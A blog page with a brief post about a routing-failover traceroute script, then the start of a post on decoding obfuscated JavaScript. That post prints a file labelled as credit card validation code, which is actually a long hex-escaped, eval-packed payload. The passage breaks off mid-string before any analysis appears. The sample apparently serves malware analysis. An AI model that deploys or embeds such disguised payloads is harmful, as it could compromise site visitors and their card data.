[Script] Network routing/failover topology change detection

A while ago I wrote a simple but useful script which I’m sharing here to detect upstream provider HSRP failover events via traceroute. It can be used for all kinds of virtual IP routing failover like VRRP, Check Point Cluster XL, actual routing protocols like BGP/OSPF or similar technologies where IP packets can be routed across multiple hops.
The script executes traceroutes to a given destination and checks whether the path is being routed over a certain hop, with the ability to send mail notifications if this is not the case.

You can get the most recent version of this script on my Github here. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment or an issue or a pull-request on Github.

Continue reading

Decoding and analyzing obfuscated JavaScript for fun and profit

Take a short peek at the following JavaScript file (“ccard.js”):

// Credit Card Validation Javascript
// copyright 12th May 2003, by Stephen Chapman, Felgall Pty Ltd
t="\x31\x30\x31\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x34\x30\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x31\x32\x2c\x34\x34\x2c\x39\x37\x2c\x34\x34\x2c\x39\x39\x2c\x34\x34\x2c\x31\x30\x37\x2c\x34\x34\x2c\x31\x30\x31\x2c\x34\x34\x2c\x31\x30\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x30\x2c\x39\x37\x2c\x36\x33\x2c\x33\x34\x2c\x33\x34\x2c\x35\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x34\x30\x2c\x39\x39\x2c\x34\x37\x2c\x39\x37\x2c\x34\x31\x2c\x34\x31\x2c\x34\x31\x2c\x34\x33\x2c\x34\x30\x2c\x34\x30\x2c\x39\x39\x2c\x36\x31\x2c\x39\x39\x2c\x33\x37\x2c\x39\x37\x2c\x34\x31\x2c\x36\x32\x2c\x35\x31\x2c\x35\x33\x2c\x36\x33\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x36\x2c\x31\x30\x32\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x36\x37\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x33\x2c\x35\x30\x2c\x35\x37\x2c\x34\x31\x2c\x35\x38\x2c\x39\x39\x2c\x34\x36\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x30\x2c\x35\x31\x2c\x35\x34\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x33\x33\x2c\x33\x39\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x34\x37\x2c\x39\x34\x2c\x34\x37\x2c\x34\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x39\x33\x2c\x36\x31\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x35\x39\x2c\x31\x30\x37\x2c\x36\x31\x2c\x39\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x30\x30\x2c\x39\x31\x2c\x31\x30\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x39\x33\x2c\x35\x39\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x31\x31\x39\x2c\x34\x33\x2c\x33\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x39\x39\x2c\x36\x31\x2c\x34\x39\x2c\x35\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x31\x39\x2c\x31\x30\x34\x2c\x31\x30\x35\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x35\x2c\x34\x35\x2c\x34\x31\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x31\x31\x32\x2c\x36\x31\x2c\x31\x31\x32\x2c\x34\x36\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x39\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x33\x32\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x34\x30\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x33\x2c\x31\x30\x31\x2c\x34\x30\x2c\x39\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x39\x2c\x39\x32\x2c\x39\x32\x2c\x39\x38\x2c\x33\x39\x2c\x34\x34\x2c\x33\x39\x2c\x31\x30\x33\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x31\x30\x37\x2c\x39\x31\x2c\x39\x39\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x33\x32\x2c\x31\x31\x32\x2c\x35\x39\x2c\x31\x32\x35\x2c\x34\x30\x2c\x33\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x39\x2c\x34\x30\x2c\x39\x37\x2c\x34\x34\x2c\x39\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x36\x31\x2c\x39\x37\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x37\x2c\x36\x31\x2c\x38\x34\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x37\x2c\x36\x31\x2c\x39\x38\x2c\x34\x36\x2c\x38\x36\x2c\x34\x30\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x38\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x38\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x34\x39\x2c\x39\x33\x2c\x34\x34\x2c\x31\x31\x37\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x33\x2c\x36\x31\x2c\x38\x38\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x37\x2c\x36\x32\x2c\x36\x31\x2c\x38\x33\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x37\x38\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x30\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x32\x2c\x34\x30\x2c\x37\x39\x2c\x34\x30\x2c\x35\x37\x2c\x34\x34\x2c\x35\x36\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x37\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x32\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x38\x39\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x37\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x31\x2c\x36\x31\x2c\x35\x37\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\x35\x37\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x34\x38\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x33\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x32\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x35\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x31\x31\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x39\x2c\x36\x31\x2c\x35\x36\x2c\x34\x36\x2c\x31\x30\x36\x2c\x34\x30\x2c\x34\x38\x2c\x34\x34\x2c\x35\x36\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x39\x32\x2c\x33\x39\x2c\x34\x35\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x38\x2c\x36\x31\x2c\x34\x30\x2c\x34\x30\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x38\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x38\x39\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x31\x2c\x34\x31\x2c\x34\x35\x2c\x31\x30\x32\x2c\x34\x36\x2c\x34\x39\x2c\x34\x39\x2c\x34\x30\x2c\x34\x39\x2c\x34\x38\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x34\x39\x2c\x35\x32\x2c\x34\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x37\x2c\x39\x32\x2c\x33\x39\x2c\x34\x33\x2c\x36\x39\x2c\x34\x31\x2c\x34\x31\x2c\x34\x37\x2c\x34\x39\x2c\x35\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x39\x38\x2c\x34\x30\x2c\x36\x38\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x38\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x37\x35\x2c\x36\x31\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x36\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x34\x30\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x35\x37\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x34\x35\x2c\x33\x34\x2c\x34\x33\x2c\x31\x30\x30\x2c\x34\x36\x2c\x34\x39\x2c\x39\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x35\x2c\x33\x32\x2c\x37\x35\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x32\x30\x2c\x36\x31\x2c\x37\x36\x2c\x34\x30\x2c\x37\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x34\x2c\x39\x32\x2c\x33\x39\x2c\x34\x39\x2c\x39\x39\x2c\x34\x35\x2c\x35\x34\x2c\x34\x35\x2c\x35\x33\x2c\x39\x32\x2c\x33\x39\x2c\x34\x31\x2c\x34\x32\x2c\x35\x33\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x36\x30\x2c\x36\x31\x2c\x37\x32\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x35\x2c\x33\x32\x2c\x31\x32\x30\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x37\x32\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x31\x30\x39\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x34\x2c\x37\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x35\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x35\x35\x2c\x34\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x36\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x33\x2c\x34\x39\x2c\x35\x33\x2c\x34\x32\x2c\x34\x39\x2c\x36\x35\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x37\x37\x2c\x34\x32\x2c\x34\x39\x2c\x31\x32\x32\x2c\x34\x31\x2c\x35\x39\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x36\x31\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x34\x39\x2c\x36\x37\x2c\x34\x30\x2c\x37\x31\x2c\x34\x31\x2c\x34\x33\x2c\x33\x34\x2c\x35\x39\x2c\x34\x39\x2c\x36\x36\x2c\x36\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x39\x2c\x34\x30\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x31\x30\x34\x2c\x33\x32\x2c\x38\x31\x2c\x34\x30\x2c\x31\x31\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x31\x2c\x34\x34\x2c\x37\x34\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x34\x39\x2c\x31\x31\x38\x2c\x34\x30\x2c\x33\x34\x2c\x34\x30\x2c\x39\x34\x2c\x31\x32\x34\x2c\x33\x32\x2c\x34\x31\x2c\x33\x34\x2c\x34\x33\x2c\x31\x31\x38\x2c\x34\x33\x2c\x33\x34\x2c\x36\x31\x2c\x34\x30\x2c\x39\x31\x2c\x39\x34\x2c\x35\x39\x2c\x39\x33\x2c\x34\x32\x2c\x34\x31\x2c\x34\x30\x2c\x35\x39\x2c\x31\x32\x34\x2c\x33\x36\x2c\x34\x31\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x31\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x37\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x32\x31\x2c\x34\x30\x2c\x37\x34\x2c\x34\x31\x2c\x34\x31\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x31\x32\x30\x2c\x34\x30\x2c\x31\x30\x31\x2c\x39\x31\x2c\x35\x30\x2c\x39\x33\x2c\x34\x31\x2c\x35\x39\x2c\x31\x31\x34\x2c\x33\x32\x2c\x35\x35\x2c\x33\x32\x2c\x34\x39\x2c\x37\x30\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x36\x31\x2c\x36\x31\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x31\x30\x35\x2c\x36\x31\x2c\x31\x32\x31\x2c\x34\x36\x2c\x31\x30\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x36\x39\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x31\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x37\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x39\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x34\x39\x2c\x35\x30\x2c\x36\x31\x2c\x34\x30\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x36\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x36\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x35\x2c\x34\x31\x2c\x34\x36\x2c\x31\x31\x33\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x34\x39\x2c\x35\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x38\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x39\x30\x2c\x36\x31\x2c\x31\x30\x37\x2c\x33\x32\x2c\x31\x30\x32\x2c\x34\x30\x2c\x34\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x30\x37\x2c\x34\x30\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x39\x30\x2c\x34\x36\x2c\x39\x39\x2c\x34\x30\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x32\x2c\x33\x34\x2c\x34\x31\x2c\x36\x32\x2c\x34\x38\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x31\x31\x32\x2c\x36\x31\x2c\x34\x38\x2c\x35\x39\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x31\x31\x32\x2c\x36\x31\x2c\x36\x31\x2c\x34\x39\x2c\x33\x38\x2c\x33\x38\x2c\x38\x31\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x31\x2c\x33\x33\x2c\x36\x31\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x33\x2c\x35\x31\x2c\x33\x32\x2c\x38\x30\x2c\x36\x31\x2c\x34\x39\x2c\x31\x30\x31\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x34\x39\x2c\x31\x30\x34\x2c\x34\x33\x2c\x34\x39\x2c\x34\x31\x2c\x35\x39\x2c\x35\x32\x2c\x34\x30\x2c\x38\x30\x2c\x36\x30\x2c\x31\x32\x30\x2c\x34\x30\x2c\x34\x31\x2c\x34\x31\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x35\x39\x2c\x35\x31\x2c\x33\x32\x2c\x36\x36\x2c\x36\x31\x2c\x39\x31\x2c\x33\x34\x2c\x34\x39\x2c\x31\x30\x33\x2c\x35\x38\x2c\x34\x37\x2c\x34\x37\x2c\x34\x39\x2c\x31\x30\x39\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x34\x2c\x34\x37\x2c\x34\x39\x2c\x31\x31\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x36\x2c\x33\x34\x2c\x39\x33\x2c\x35\x39\x2c\x34\x39\x2c\x31\x31\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x33\x2c\x36\x31\x2c\x36\x36\x2c\x39\x31\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x32\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x36\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x32\x35\x2c\x33\x39\x2c\x34\x34\x2c\x35\x34\x2c\x35\x30\x2c\x34\x34\x2c\x34\x39\x2c\x34\x38\x2c\x35\x34\x2c\x34\x34\x2c\x33\x39\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x